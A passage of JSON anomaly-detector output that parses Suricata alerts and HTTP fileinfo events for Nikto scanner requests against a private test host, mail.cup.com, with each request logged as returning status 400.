"/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1783781506312318, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.224312+0000\",\"flow_id\":1783781506312318,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46838,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.shtml\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.shtml\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.22 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.226910 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46840 -> 192.168.10.154:80", "/parser/model/time": 1583349514.22691, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", 
"/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46840, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.226910 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46840 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.23 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.shm", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.227159+0000\",\"flow_id\":1061372302094328,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46840,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.shm\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.shm\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", 
"/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.227159, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1061372302094328,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46840,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.shm\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.shm\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46840,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.shm\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.shm\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.shm\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", 
"/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.shm\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.shm", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.shm", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, 
"/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46840,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46840, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1061372302094328,", 
"/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1061372302094328, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.227159+0000\",\"flow_id\":1061372302094328,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46840,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.shm\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.shm\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.23 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.229413 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46842 -> 192.168.10.154:80", "/parser/model/time": 1583349514.229413, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", 
"/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46842, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.229413 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46842 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.23 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.btr", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.229692+0000\",\"flow_id\":1638959504063480,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46842,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.btr\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.btr\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", 
"/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.229692, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1638959504063480,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46842,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.btr\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.btr\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46842,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.btr\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.btr\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.btr\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", 
"/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.btr\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.btr", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.btr", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, 
"/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46842,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46842, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1638959504063480,", 
"/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1638959504063480, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.229692+0000\",\"flow_id\":1638959504063480,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46842,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.btr\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.btr\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.23 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.231549 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46844 -> 192.168.10.154:80", "/parser/model/time": 1583349514.231549, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", 
"/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46844, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.231549 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46844 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.23 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.list", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.231715+0000\",\"flow_id\":212665289573775,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46844,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.list\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.list\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.231715, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":212665289573775,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46844,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.list\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.list\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46844,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.list\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": 
"\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.list\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.list\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.list\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.list", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.list", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", 
"/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", 